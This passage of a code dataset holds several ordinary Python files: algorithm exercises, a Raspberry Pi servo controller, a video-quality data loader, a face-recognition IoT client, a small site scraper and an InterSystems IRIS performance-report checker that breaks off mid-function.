storage = StorageImplementation()\n presenter = ObservationPresenterImplementation()\n\n interactor = CreateObservationInteractor(\n storage=storage\n )\n response = interactor.create_observation_wrapper(\n observation_dto=observation_dto,\n presenter=presenter\n )\n return response\n","repo_name":"Lavanyarr/reporting_portal","sub_path":"reporting_portal/views/create_observation/api_wrapper.py","file_name":"api_wrapper.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43231585130","text":"#!/usr/bin/env python\n# encoding: utf-8\n'''\n@author: kafkal\n@contact: 1051748335@qq.com\n@software: pycharm\n@file: 53.py\n@time: 2019/2/14 014 11:14\n@desc:\n给定一个整数数组 nums ,找到一个具有最大和的连续子数组(子数组最少包含一个元素),返回其最大和。\n\n示例:\n\n输入: [-2,1,-3,4,-1,2,1,-5,4],\n输出: 6\n解释: 连续子数组 [4,-1,2,1] 的和最大,为 6。\n\n\n'''\n\ndef maxSubArray(nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if len(nums) == 0:\n return 0\n else:\n sum = nums[0]\n temp = 0\n for i in nums:\n if temp+i > i:\n temp = temp+i\n else:\n temp = i\n sum = max(temp,sum)\n return sum\n # sum = 0\n # max_sub_sum = nums[0]\n # for i in nums:\n # sum = sum + i\n # max_sub_sum = max(sum,max_sub_sum)\n # # if sum > max_sub_sum:\n # # max_sub_sum = sum\n # if sum < 0:\n # sum = 0\n # return max_sub_sum\n\nnums = [-2,1,-3,4,-1,2,1,-5,4]\nprint(maxSubArray(nums))","repo_name":"kafkalm/LeetCode","sub_path":"LeetCode/53.py","file_name":"53.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7674430854","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\n\n# Camera servo\n#Initialize Camera Servo\nCAMERA_SERVO_PIN = 4\nLEFT_MAX_ROTATION = 12.5\nRIGHT_MIN_ROTATION = 7.5\nROTATION_STEP = 1.5\nSTARTING_ROTATION = 11.5\nhorz_servo_pin = 12\nGPIO.setup(CAMERA_SERVO_PIN, GPIO.OUT)\ncameraServo = GPIO.PWM(CAMERA_SERVO_PIN, 50)\n\n\ndef camera_rotate(direction, start):\n global camer_servo_pos\n if start:\n camer_servo_pos = STARTING_ROTATION\n cameraServo.start(camer_servo_pos)\n else:\n if direction == \"DOWN\":\n if (camer_servo_pos + ROTATION_STEP) >= LEFT_MAX_ROTATION:\n camer_servo_pos = LEFT_MAX_ROTATION\n else:\n camer_servo_pos += ROTATION_STEP\n cameraServo.ChangeDutyCycle(camer_servo_pos)\n elif direction == \"UP\":\n if (camer_servo_pos - ROTATION_STEP) <= RIGHT_MIN_ROTATION:\n camer_servo_pos = RIGHT_MIN_ROTATION\n else:\n camer_servo_pos -= ROTATION_STEP\n cameraServo.ChangeDutyCycle(camer_servo_pos)\n print(direction, camer_servo_pos)\n time.sleep(.5)\n cameraServo.ChangeDutyCycle(0)\n\ncamera_rotate(\"DOWN\", True)\n\n\nclass Servos(object):\n\n @staticmethod\n def command(servo_status):\n if servo_status is not None:\n if servo_status.direction:\n camera_rotate(servo_status.direction, False)\n","repo_name":"schlank/UberPi","sub_path":"robot/Servos.py","file_name":"Servos.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"25878032072","text":"from sys import stdout\nwr = stdout.write\n\n\ndef add_edge(v, w):\n ady[v].append(w)\n\n\ndef bfs(s):\n visited = [[] for i in range(V)]\n queue = []\n visited[s] = True\n queue.append(s)\n while len(queue) != 0:\n # queue.poll()\n s = queue[0]\n queue = queue[1:]\n \n wr(f'{str(s)} ')\n aux = ady[s]\n for j in range(len(aux)):\n n = aux[j]\n if(not visited[n]):\n visited[n] = True\n queue.append(n)\n\n\nV = 4\nady = [[] for i in range(V)]\nadd_edge(0, 1)\nadd_edge(0, 2)\nadd_edge(1, 2)\nadd_edge(2, 0)\nadd_edge(2, 3)\nadd_edge(3, 3)\ninicial = 0\nwr(f'Siguiendo BFS desde el nodo {inicial}\\n')\nbfs(inicial)\n","repo_name":"roca12/gpccodes","sub_path":"Codigos estudiantes por lenguaje/PY/Bryann Valderrama/Grafos/BFS_BusquedaEnAnchura.py","file_name":"BFS_BusquedaEnAnchura.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"6845467000","text":"import pascal\nimport re\n\ndef getBin(a:int,b:int,n:int):\n\n \"\"\"returns the newtons binome for the variables (a + b) ^ n ~~ in string format\"\"\"\n\n res = []\n bN = 0\n aN = n\n for i in pascal.makePascal(n)[n-1]:\n res.append( f\"{i}*({a}^{aN})*({b}^{bN})\" ) \n aN -= 1\n bN += 1\n joined = \" + \".join(res)\n return joined\n\ndef getK():\n pass\n\ndef main():\n i = input(\"ievadi binomu(a+b): \")\n n = int(input(\"kādā pakāpē?: \"))\n regex = re.search(r\"(\\d+)\\+(\\d+)\", i)\n\n print(getBin(int(regex.group(1)), int(regex.group(2)), n))\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"ralfseduards/vscode-main","sub_path":"maths/newtBin.py","file_name":"newtBin.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69823212241","text":"class Solution:\n # @param a, a string\n # @param b, a string\n # @return a string\n def addBinary(self, a, b):\n la,lb = len(a)-1,len(b)-1\n c = 0\n result = []\n while la >= 0 or lb >= 0:\n ia, ib = 0, 0\n if la >= 0:\n ia = 1 if a[la] == '1' else 0\n if lb >= 0:\n ib = 1 if b[lb] == '1' else 0\n r = ia + ib + c\n c = 1 if r >= 2 else 0\n r = r % 2\n result.append(r)\n la -= 1\n lb -= 1\n if c: result.append(c)\n result.reverse()\n return ''.join(str(i) for i in result)\n","repo_name":"FreezingGod/leetcode","sub_path":"add_binary/sol2.py","file_name":"sol2.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71722592400","text":"from __future__ import absolute_import, division, print_function\nimport numpy as np\n\n# Define DB information\nBASE_PATH = 'Your DB path'\nLIST_FILE_NAME = 'CSIQ_VQA.txt'\nALL_SCENES = list(range(12))\nALL_DIST_TYPES = list(range(7)) #including reference\n\n\ndef make_image_list(scenes, dist_types=None, show_info=True):\n \"\"\"\n Make image list from CSIQ VIDEO database\n CSIQ: 12 reference videos x 7 types (including REFERENCE)\n \"\"\"\n # Get reference / distorted image file lists:\n # d_img_list and score_list\n d_vid_list, r_vid_list, r_idx_list, score_list, fps_list = [], [], [], [], []\n # list_file_name = os.path.join(BASE_PATH, LIST_FILE_NAME)\n list_file_name = LIST_FILE_NAME\n with open(list_file_name, 'r') as listFile:\n for line in listFile:\n # ref_idx ref_name dist_name dist_types, DMOS, width, height\n scn_idx, dis_idx, ref, dis, score, width, height, fps= line.split()\n scn_idx = int(scn_idx)\n dis_idx = int(dis_idx)\n if scn_idx in scenes and dis_idx in dist_types:\n d_vid_list.append(dis)\n r_vid_list.append(ref)\n r_idx_list.append(scn_idx)\n score_list.append(float(score))\n fps_list.append(fps)\n\n score_list = np.array(score_list, dtype='float32')\n # DMOS -> reverse subjecive scores by default\n score_list = 1 - score_list\n\n n_videos = len(d_vid_list)\n\n dist_names = ['ref', 'AVC', 'Packet', 'MJPEG', 'Wavelet', 'WN', 'HEVC']\n # Distortion types\n # 0 = ref\n # 1 = H.264 / AVC compression\n # 2 = H.264 video with packet loss rate\n # 3 = MJPEG compression\n # 4 = Wavelet compression(snow codec)\n # 5 = White noise\n # 6 = HEVC compression\n\n if show_info:\n scenes.sort()\n print(' - Scenes: %s' % ', '.join([str(i) for i in scenes]))\n print(' - Distortion types: %s' % ', '.join(\n [dist_names[idx] for idx in dist_types]))\n print(' - Number of videos: {:,}'.format(n_videos))\n print(' - DMOS range: [{:.2f}, {:.2f}]'.format(\n np.min(score_list), np.max(score_list)), end='')\n print(' (Scale reversed)')\n\n return {\n 'scenes': scenes,\n 'dist_types': dist_types,\n 'base_path': BASE_PATH,\n 'n_images': n_videos,\n 'n_videos': n_videos,\n 'd_img_list': d_vid_list,\n 'r_img_list': r_vid_list,\n 'r_idx_list': r_idx_list,\n 'score_list': score_list,\n 'fps_list': fps_list\n }\n","repo_name":"haitian2du/DeepVQA_Release","sub_path":"VQA_Deep/data_load/CSIQ_VQA.py","file_name":"CSIQ_VQA.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38182455064","text":"import requests\nimport json\nimport time\n\n\nclass Client:\n def __init__(self, device_id, url='http://185.252.30.176/'):\n self.url = url\n self.device_id = device_id\n self.access_token = None\n\n def send_request(self, req_type, **kwargs):\n req_url = self.url + req_type\n return requests.post(req_url,\n json=kwargs,\n headers={'Content-Type': 'application/json'})\n\n def hello(self):\n result = self.send_request('hello/', device_id=self.device_id)\n if result.json()['message'] == 'Device is yet to be claimed by a user':\n return -1\n while not result.json()['ok']:\n time.sleep(1)\n result = self.send_request('hello/', device_id=self.device_id)\n else:\n self.access_token = result.json()['response']['token']\n return 0\n\n def fetch(self):\n result = self.send_request('fetch/', token=self.access_token)\n encodings = [json.loads(result.json()['response']['faces'][i]['embedding'])\n for i in range(len(result.json()['response']['faces']))]\n ids = [result.json()['response']['faces'][i]['face_id']\n for i in range(len(result.json()['response']['faces']))]\n in_count = result.json()['response']['in_count']\n return encodings, ids, in_count\n\n def introduce(self, pic, embedding):\n introduce_url = self.url + 'introduce/'\n result = requests.post(introduce_url,\n data={'token': self.access_token, 'embedding': json.dumps(embedding)},\n files={'image': pic})\n\n if result.json()['ok']:\n return {'ok': True, 'face_id': result.json()['response']['face_id']}\n else:\n return {'ok': False}\n\n def log(self, face_id, enter):\n result = self.send_request('log/', token=self.access_token, face_id=face_id, kind='E' if enter else 'L')\n return result.json()\n","repo_name":"vahidzee/pi-surveillance","sub_path":"pi/src/iot.py","file_name":"iot.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"7110066072","text":"import requests\nimport parsel\n\nkey_word=input('输入搜索关键词: ')\nheaders = {\n 'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'\n}\nurl='https://wnacg.com/albums-index-page-1-sname-%s.html' % key_word\nhtml=requests.get(url=url,headers=headers).text\npage_num_list=parsel.Selector(html).xpath('//*[@id=\"bodywrap\"]/div[2]/div[2]/div')\nfor i in page_num_list:\n try:\n print(i.xpath('./a/text()').extract()[-1])\n except:\n print('1')\n\n# print(html)","repo_name":"Erica-Iris/Python","sub_path":"WNACG_Downer/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21519263582","text":"\"\"\"\nCheck IRIS SystemPerformance or Caché pButtons\n\nExtract useful details to create a performance report.\nValidate common OS and IRIS/Caché configuration settings and show pass, fail\nand suggested fixes.\n\n\"\"\"\n\n\ndef shared_memory_estimate(\n global_buffers_mb,\n routine_buffers_mb,\n gmheap_in_mb,\n number_of_logical_cpus,\n jrnbufs_in_mb,\n MaxServerConn,\n MaxServers,\n):\n\n # Shared memory size in MB =\n # [global buffers in MB] * 1.08 + [routine buffers in MB] * 1.02\n # + [gmheap in KB]/1024 + 2 * [number of logical CPUs] + [jrnbufs in MB] +\n # 2 * ( [MaxServerConn] + [MaxServers]) + 300 [overall fixed padding]\n\n overall_fixed_padding = 300\n\n total_shared_memory = (\n (global_buffers_mb * 1.08)\n + (routine_buffers_mb * 1.02)\n + gmheap_in_mb\n + (2 * number_of_logical_cpus)\n + jrnbufs_in_mb\n + (2 * (MaxServerConn + MaxServers))\n + overall_fixed_padding\n )\n\n return int(total_shared_memory)\n\n\ndef system_check(input_file):\n sp_dict = {}\n operating_system = \"\"\n cpf_section = False\n\n linux_info_available = False\n dev_mapper_section = True\n dev_mapper_counter = 0\n\n filesystem_info_available = False\n filesystem_section = True\n filesystem_counter = 0\n\n shared_memory_available = False\n shared_memory_section = True\n shared_memory_counter = 0\n shared_memory_total = 0\n\n with open(input_file, \"r\", encoding=\"ISO-8859-1\") as file:\n\n model_name = True\n windows_info_available = False\n\n memory_next = False\n perfmon_next = False\n\n up_counter = 0\n\n for line in file:\n\n if \"[ConfigFile]\" in line:\n cpf_section = True\n elif \"!-- beg_mgstat --\" in line:\n cpf_section = False\n\n # Summary\n\n if \"VMware\" in line:\n sp_dict[\"platform\"] = \"VMware\"\n\n if \"Customer: \" in line:\n customer = (line.split(\":\")[1]).strip()\n sp_dict[\"customer\"] = customer\n\n if \"overview=\" in line:\n sp_dict[\"overview\"] = (line.split(\"=\")[1]).strip()\n\n # Product Version String:\n if \"Version String: \" in line or \"Product Version String: \" in line:\n sp_dict[\"version string\"] = (line.split(\":\", 1)[1]).strip()\n\n if \"Windows\" in line:\n sp_dict[\"operating system\"] = \"Windows\"\n operating_system = \"Windows\"\n elif \"Linux\" in line:\n sp_dict[\"operating system\"] = \"Linux\"\n operating_system = \"Linux\"\n elif \"AIX\" in line:\n sp_dict[\"operating system\"] = \"AIX\"\n operating_system = \"AIX\"\n elif \"Ubuntu\" in line:\n sp_dict[\"operating system\"] = \"Ubuntu\"\n operating_system = \"Ubuntu\"\n # Placeholder for when I care.\n elif \"Oracle Solaris\" in line:\n sp_dict[\"operating system\"] = \"Unknown\"\n operating_system = \"Unknown\"\n else:\n sp_dict[\"operating system\"] = \"Unknown\"\n operating_system = \"Unknown\"\n\n if \"Profile run \" in line:\n sp_dict[\"profile run\"] = line.strip()\n\n if \"Run over \" in line:\n sp_dict[\"run over\"] = line.strip()\n\n if \"on machine\" in line:\n sp_dict[f\"instance\"] = (line.split(\" on machine \", 1)[0]).strip()\n sp_dict[f\"linux hostname\"] = (line.split(\" on machine \", 1)[1]).strip()\n\n if line.startswith(\"up \"):\n up_counter += 1\n sp_dict[f\"up instance {up_counter}\"] = (line.split(\" \", 1)[1]).strip()\n\n # mgstat\n\n if \"numberofcpus=\" in line:\n sp_dict[\"mgstat header\"] = line.strip()\n\n mgstat_header = sp_dict[\"mgstat header\"].split(\",\")\n for item in mgstat_header:\n if \"numberofcpus\" in item:\n sp_dict[\"number cpus\"] = item.split(\"=\")[1].split(\":\")[0]\n\n # Linux cpu info\n\n if \"model name\t:\" in line:\n if model_name:\n model_name = False\n sp_dict[\"processor model\"] = (line.split(\":\")[1]).strip()\n\n # CPF file\n\n if cpf_section:\n if \"AlternateDirectory=\" in line:\n sp_dict[\"alternate journal\"] = (line.split(\"=\")[1]).strip()\n if \"CurrentDirectory=\" in line and not line[0] == \";\":\n sp_dict[\"current journal\"] = (line.split(\"=\")[1]).strip()\n if \"globals=\" in line:\n sp_dict[\"globals\"] = (line.split(\"=\")[1]).strip()\n if \"gmheap=\" in line:\n sp_dict[\"gmheap\"] = (line.split(\"=\")[1]).strip()\n if \"locksiz=\" in line:\n sp_dict[\"locksiz\"] = (line.split(\"=\")[1]).strip()\n if \"routines=\" in line:\n sp_dict[\"routines\"] = (line.split(\"=\")[1]).strip()\n if \"wijdir=\" in line:\n sp_dict[\"wijdir\"] = (line.split(\"=\")[1]).strip()\n if \"FreezeOnError\" in line:\n sp_dict[\"freeze\"] = (line.split(\"=\")[1]).strip()\n if \"Asyncwij=\" in line:\n sp_dict[\"asyncwij\"] = (line.split(\"=\")[1]).strip()\n if \"wduseasyncio=\" in line:\n sp_dict[\"wduseasyncio\"] = (line.split(\"=\")[1]).strip()\n if \"jrnbufs=\" in line:\n sp_dict[\"jrnbufs\"] = (line.split(\"=\")[1]).strip()\n\n # Chad's metrics\n if \"CACHESYS=\" in line:\n sp_dict[\"CACHESYS\"] = (line.split(\"=\")[1]).strip()\n if \"IRISSYS=\" in line:\n sp_dict[\"IRISSYS\"] = (line.split(\"=\")[1]).strip()\n if \"memlock=\" in line:\n sp_dict[\"memlock\"] = (line.split(\"=\")[1]).strip()\n if \"WebServer=\" in line:\n sp_dict[\"WebServer\"] = (line.split(\"=\")[1]).strip()\n if \"MaxServers=\" in line:\n sp_dict[\"MaxServers\"] = (line.split(\"=\")[1]).strip()\n if \"MaxServerConn=\" in line:\n sp_dict[\"MaxServerConn\"] = (line.split(\"=\")[1]).strip()\n if \"DaysBeforePurge=\" in line:\n sp_dict[\"DaysBeforePurge\"] = (line.split(\"=\")[1]).strip()\n\n # Linux filesystem info\n\n if \"<div id=Linuxinfo>\" in line:\n linux_info_available = True\n\n if linux_info_available:\n\n if \"/dev/mapper:\" in line:\n dev_mapper_section = True\n\n if dev_mapper_section:\n\n if \"->\" in line:\n sp_dict[f\"dev mapper {dev_mapper_counter}\"] = line.strip()\n dev_mapper_counter += 1\n\n if dev_mapper_counter > 0 and \"rw\" not in line:\n dev_mapper_section = False\n\n if \"<div id=df-m>\" in line:\n filesystem_info_available = True\n\n if filesystem_info_available:\n\n if \"Filesystem \" in line:\n filesystem_section = True\n\n if filesystem_section and \"</pre>\" in line:\n filesystem_section = False\n\n if filesystem_section:\n sp_dict[f\"filesystem df {filesystem_counter}\"] = line.strip()\n filesystem_counter += 1\n\n if \"Shared Memory Segments\" in line:\n shared_memory_available = True\n\n if shared_memory_available:\n if \"key\" in line:\n shared_memory_section = True\n\n if shared_memory_section and line.strip() == \"\":\n shared_memory_section = False\n shared_memory_available = False\n sp_dict[\n f\"Shared memory ipcs {shared_memory_counter}\"\n ] = f\"Total shared memory used: {int(shared_memory_total/1024/1024):,} MB\"\n sp_dict[\"Shared memory segment total\"] = shared_memory_total\n\n if shared_memory_section:\n if \"key\" not in line and \"----\" not in line:\n shared_memory_columns = line.split()\n shared_memory_bytes = int(shared_memory_columns[4])\n shared_memory_total += shared_memory_bytes\n\n sp_dict[f\"Shared memory ipcs {shared_memory_counter}\"] = line.strip()\n shared_memory_counter += 1\n\n # Linux kernel\n\n if \"swappiness\" in line:\n sp_dict[\"swappiness\"] = (line.split(\"=\")[1]).strip()\n\n # Number hugepages = shared memory. eg 48GB/2048 = 24576\n if \"vm.nr_hugepages\" in line:\n sp_dict[\"vm.nr_hugepages\"] = (line.split(\"=\")[1]).strip()\n\n # Shared memory must be greater than hugepages in bytes (IRIS shared memory)\n if \"kernel.shmmax\" in line:\n sp_dict[\"kernel.shmmax\"] = (line.split(\"=\")[1]).strip()\n if \"kernel.shmall\" in line:\n sp_dict[\"kernel.shmall\"] = (line.split(\"=\")[1]).strip()\n\n if \"max locked memory\" in line:\n sp_dict[\"max locked memory\"] = (line.split(\")\")[1]).strip()\n\n # dirty_* parameters are not relevant if using async IO – which any IRIS-based install should be.\n # # dirty background ratio = 5\n # if \"vm.dirty_background_ratio\" in line:\n # sp_dict[\"vm.dirty_background_ratio\"] = (line.split(\"=\")[1]).strip()\n #\n # # dirty ratio = 10\n # if \"vm.dirty_ratio\" in line:\n # sp_dict[\"vm.dirty_ratio\"] = (line.split(\"=\")[1]).strip()\n\n # Linux free\n\n if memory_next:\n if \"Memtotal\" in line:\n pass\n else:\n sp_dict[\"memory MB\"] = (line.split(\",\")[2]).strip()\n memory_next = False\n if \"<div id=free>\" in line:\n memory_next = True\n\n # Windows info\n if \"Windows info\" in line:\n windows_info_available = True\n\n if windows_info_available:\n if \"Host Name:\" in line:\n sp_dict[\"windows host name\"] = (line.split(\":\")[1]).strip()\n if \"OS Name:\" in line:\n sp_dict[\"windows os name\"] = (line.split(\":\")[1]).strip()\n if \"[01]: Intel64 Family\" in line:\n sp_dict[\"windows processor\"] = (line.split(\":\")[1]).strip()\n if \"Time Zone:\" in line:\n sp_dict[\"windows time zone\"] = line.strip()\n if \"Total Physical Memory:\" in line:\n sp_dict[\"windows total memory\"] = (line.split(\":\")[1]).strip()\n if \"hypervisor\" in line:\n sp_dict[\"windows hypervisor\"] = line.strip()\n\n # Windows perform\n\n if perfmon_next:\n sp_dict[\"perfmon_header\"] = line.strip()\n perfmon_next = False\n if \"beg_win_perfmon\" in line:\n perfmon_next = True\n\n # AIX\n if operating_system == \"AIX\":\n if \"Processor Type:\" in line:\n sp_dict[\"processor model\"] = (line.split(\":\")[1]).strip()\n if \"smt_threads\" in line:\n sp_dict[\"AIX SMT\"] = f'{(line.split(\" \")[1]).strip()}'\n if \"Memory Size:\" in line:\n sp_dict[\"memory MB\"] = (line.split(\":\")[1]).split()[0].strip()\n # Number Of Processors: 10\n # Memory Size: 24576 MB\n # smt_threads 8\n\n # # Debug\n # for key in sp_dict:\n # print(f\"{key} : {sp_dict[key]}\")\n\n # Tidy up not found keys\n\n if \"asyncwij\" not in sp_dict:\n sp_dict[\"asyncwij\"] = 0\n if \"wduseasyncio\" not in sp_dict:\n sp_dict[\"wduseasyncio\"] = 0\n\n if \"processor model\" not in sp_dict:\n if \"windows processor\" not in sp_dict:\n sp_dict[\"processor model\"] = \"Unknown Processor\"\n else:\n sp_dict[\"processor model\"] = sp_dict[\"windows processor\"]\n\n if \"memory MB\" not in sp_dict:\n if \"windows total memory\" in sp_dict:\n # Extract numbers only. Eg there may be point, commas, letters, and others from around the world.\n sp_dict[\"memory MB\"] = int(\"\".join(i for i in sp_dict[\"windows total memory\"] if i.isdigit()))\n else:\n sp_dict[\"memory MB\"] = 0\n\n return sp_dict\n\n\ndef build_log(sp_dict):\n # Build log for cut and paste\n\n ct_dict = {}\n pass_count = warn_count = recommend_count = 0\n ct_dict[\"swappiness\"] = 5\n\n # split up mgstat header\n\n mgstat_header = sp_dict[\"mgstat header\"].split(\",\")\n for item in mgstat_header:\n if \"numberofcpus\" in item:\n sp_dict[\"number cpus\"] = item.split(\"=\")[1].split(\":\")[0]\n\n # CPF\n\n if \"WebServer\" in sp_dict:\n if sp_dict[\"WebServer\"] == \"1\":\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = f\"** Insecure Private Webserver Enabled! **\"\n\n if \"freeze\" in sp_dict:\n if sp_dict[\"freeze\"] == \"0\":\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = (\n f\"Journal freeze on error is not enabled. If journal IO errors occur \"\n f\"database activity that occurs during this period cannot be restored. \"\n )\n else:\n pass_count += 1\n sp_dict[f\"pass {pass_count}\"] = f\"freeze on error is enabled.\"\n\n if sp_dict[\"current journal\"] == sp_dict[\"alternate journal\"]:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = f\"Primary Journal is the same as Alternate Journal\"\n\n if \"globals\" in sp_dict:\n globals = sp_dict[\"globals\"].split(\",\")\n globals_total = 0\n for item in globals:\n globals_total += int(item)\n sp_dict[\"globals total MB\"] = globals_total\n\n if \"routines\" in sp_dict:\n routines = sp_dict[\"routines\"].split(\",\")\n routines_total = 0\n for item in routines:\n routines_total += int(item)\n sp_dict[\"routines total MB\"] = routines_total\n\n # Chad's metrics\n\n if \"gmheap\" in sp_dict:\n if int(sp_dict[\"gmheap\"]) == 37568:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = f\"gmheap is default\"\n\n if int(sp_dict[\"gmheap\"]) / 1024 < 200:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = f\"gmheap {sp_dict['gmheap']} size does not support parallel dejournaling\"\n\n if \"locksiz\" in sp_dict:\n if int(sp_dict[\"locksiz\"]) == 16777216:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = f\"locksiz is default\"\n if int(sp_dict[\"locksiz\"]) < 16777216:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = f\"locksiz {sp_dict['locksiz']} is less than IRIS default (16777216)\"\n\n if \"wijdir\" in sp_dict:\n if sp_dict[\"wijdir\"] == \"\":\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = f\"WIJ in Installation Directory\"\n\n # Linux kernel\n\n if \"swappiness\" in sp_dict:\n if int(sp_dict[\"swappiness\"]) > ct_dict[\"swappiness\"]:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = (\n f\"swappiness is {sp_dict['swappiness']}. \"\n f\"For databases {ct_dict['swappiness']} \"\n f\"is recommended to adjust how aggressive the Linux kernel swaps memory \"\n f\"pages to disk. \"\n )\n else:\n pass_count += 1\n sp_dict[f\"pass {pass_count}\"] = f\"swappiness is {sp_dict['swappiness']}\"\n\n # memory comes from Linux free or from Windows info\n\n if \"memlock\" in sp_dict:\n if int(sp_dict[\"memlock\"]) == 0:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = f\"memlock={sp_dict['memlock']} does not enforce Huge/Large pages\"\n\n if \"memory MB\" in sp_dict:\n\n huge_page_size_kb = 2048\n\n sp_dict[\"memory GB\"] = f\"{round(int(sp_dict['memory MB']) / 1024)}\"\n\n # Basic shared memory calculation\n sp_dict[\"shared memory MB\"] = (\n sp_dict[\"globals total MB\"] + sp_dict[\"routines total MB\"] + round(int(sp_dict[\"gmheap\"]) / 1024)\n )\n sp_dict[\n \"shared memory calc\"\n ] = f\"globals {sp_dict['globals total MB']} MB + routines {sp_dict['routines total MB']} MB + gmheap {round(int(sp_dict['gmheap']) / 1024)} MB\"\n\n # Estimate total shared memory (e.g. for huge pages) based on 2022.1 calculations\n all_present = False\n if \"routines total MB\" in sp_dict:\n routine_buffers_mb = int(sp_dict[\"routines total MB\"])\n if \"gmheap\" in sp_dict:\n gmheap_in_mb = int(int(sp_dict[\"gmheap\"]) / 1024)\n if \"number cpus\" in sp_dict:\n number_of_logical_cpus = int(sp_dict[\"number cpus\"])\n if \"jrnbufs\" in sp_dict:\n jrnbufs_in_mb = int(sp_dict[\"jrnbufs\"])\n if \"MaxServerConn\" in sp_dict:\n MaxServerConn = int(sp_dict[\"MaxServerConn\"])\n if \"MaxServers\" in sp_dict:\n MaxServers = int(sp_dict[\"MaxServers\"])\n if \"globals total MB\" in sp_dict:\n global_buffers_mb = int(sp_dict[\"globals total MB\"])\n all_present = True\n\n if all_present:\n total_shared_memory = shared_memory_estimate(\n global_buffers_mb,\n routine_buffers_mb,\n gmheap_in_mb,\n number_of_logical_cpus,\n jrnbufs_in_mb,\n MaxServerConn,\n MaxServers,\n )\n\n sp_dict[\"Estimated total IRIS shared memory\"] = total_shared_memory\n sp_dict[\"Estimated total IRIS shared memory text\"] = (\n f\"Estimated total shared memory (MB):\\n\"\n f\"[global buffers in MB] * 1.08 + [routine buffers in MB] * 1.02 + [gmheap in MB] + \\n\"\n f\" 2 * [number of logical CPUs] + [jrnbufs in MB] + 2 * ( [MaxServerConn] + [MaxServers]) + \"\n f\"300 [overall fixed padding]\\n\\n\"\n f\"[{global_buffers_mb}] * 1.08 + [{routine_buffers_mb}] * 1.02 + [{gmheap_in_mb}] + \\n\"\n f\" 2 * [{number_of_logical_cpus}] + [{jrnbufs_in_mb}] + 2 * ( [{MaxServerConn}] + [{MaxServers}]) + \"\n f\"300 [overall fixed padding]\\n\\n\"\n f\"See https://docs.intersystems.com/irislatest/csp/docbook/DocBook.UI.Page.cls\"\n f\"?KEY=ARES#ARES_memory_plan_estimate\\n\"\n )\n\n sp_dict[\"75pct memory MB\"] = round(int(sp_dict[\"memory MB\"]) * 0.75)\n sp_dict[\"75pct memory number huge pages\"] = round((sp_dict[\"75pct memory MB\"] * 1024) / huge_page_size_kb)\n\n if \"vm.nr_hugepages\" in sp_dict:\n\n if int(sp_dict[\"vm.nr_hugepages\"]) == 0:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = (\n f\"HugePages are not set. Consider huge page memory space for production instances to improve \"\n f\"performance and efficiency and to protect the shared memory from paging out. \"\n f\"Specifying HugePages much higher than the shared memory amount is not advisable because the \"\n f\"unused memory is not available to other components.\"\n )\n\n recommend_count += 1\n sp_dict[f\"recommend {recommend_count}\"] = (\n f\"Set HugePages, see IRIS documentation: \"\n f\"https://docs.intersystems.com/irislatest/csp/docbook/Doc.View\"\n f\".cls?KEY=GCI_prepare_install#GCI_memory_big_linux \"\n )\n\n recommend_count += 1\n msg = f\"Total memory is {int(sp_dict['memory MB']):,} MB, 75% of total memory is {int(sp_dict['75pct memory MB']):,} MB.\"\n sp_dict[f\"recommend {recommend_count}\"] = msg\n\n recommend_count += 1\n msg = (\n f\"Shared memory (globals+routines+gmheap+other) is {sp_dict['shared memory MB']:,} MB. \"\n f\"({round((sp_dict['shared memory MB'] / int(sp_dict['memory MB'])) * 100):,}% of total memory).\"\n )\n sp_dict[f\"recommend {recommend_count}\"] = msg\n\n recommend_count += 1\n # If all the info for full estimate use that, else ballpark\n if \"Estimated total IRIS shared memory\" in sp_dict:\n msg = (\n f\"Number of HugePages for {huge_page_size_kb} KB page size for {sp_dict['Estimated total IRIS shared memory']:,} MB \"\n f\"is {round((sp_dict['Estimated total IRIS shared memory'] * 1024) / huge_page_size_kb)}\"\n )\n else:\n shared_memory_plus_8pct = round(sp_dict[\"shared memory MB\"] * 1.08)\n msg = (\n f\"Number of HugePages for {huge_page_size_kb} KB page size for ({sp_dict['shared memory MB']:,} MB + 8% buffer = {shared_memory_plus_8pct:,} MB) \"\n f\"is {round((shared_memory_plus_8pct * 1024) / huge_page_size_kb)}\"\n )\n\n sp_dict[f\"recommend {recommend_count}\"] = msg\n\n if \"max locked memory\" in sp_dict:\n if sp_dict[\"max locked memory\"].isdigit():\n if int(sp_dict[\"max locked memory\"]) < 100:\n warn_count += 1\n 